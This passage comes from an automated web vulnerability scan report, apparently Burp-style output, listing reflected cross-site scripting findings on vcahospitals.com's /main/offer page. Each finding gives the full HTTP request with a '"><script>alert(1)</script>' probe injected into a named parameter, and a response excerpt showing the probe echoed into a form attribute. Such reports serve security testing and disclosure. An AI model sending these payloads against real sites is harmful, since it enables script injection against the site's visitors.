52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.46. http://www.vcahospitals.com/main/offer [useragent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccc8"><script>alert(1)</script>dd190c671a2 was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=icsbsqp3afi5ar05hms93sc531; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f65b"><script>alert(1)</script>14ab4538db8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0mlrillum4vu8mp1o97hfbr3r3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b9c"><script>alert(1)</script>72b305046a9 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=baenvd1f3pb9gev61jv8jo9f25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.49. http://www.vcahospitals.com/main/offer [utm_source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfe2"><script>alert(1)</script>09d0de21174 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t86j051ojsn7hfvp5cju39eml7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.50. http://www.vcahospitals.com/main/offer [utm_term parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec13"><script>alert(1)</script>22dd34fcafe was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ul77dhjfgbf0ges117v5r933n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.51. http://www.vcahospitals.com/main/offer [variant parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dad"><script>alert(1)</script>b2542e55643 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohcttmqldd2o8ov91qf8l0ptp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.52. http://www.vcahospitals.com/main/offer [zip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835b4"><script>alert(1)</script>e5f0d47fe97 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9duq7ra7irdi2bi4ngj9f38dk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.53. http://www.vcahospitals.com/main/offer/ [ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4ae"><script>alert(1)</script>6cab6f57fc7 was submitted in the parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
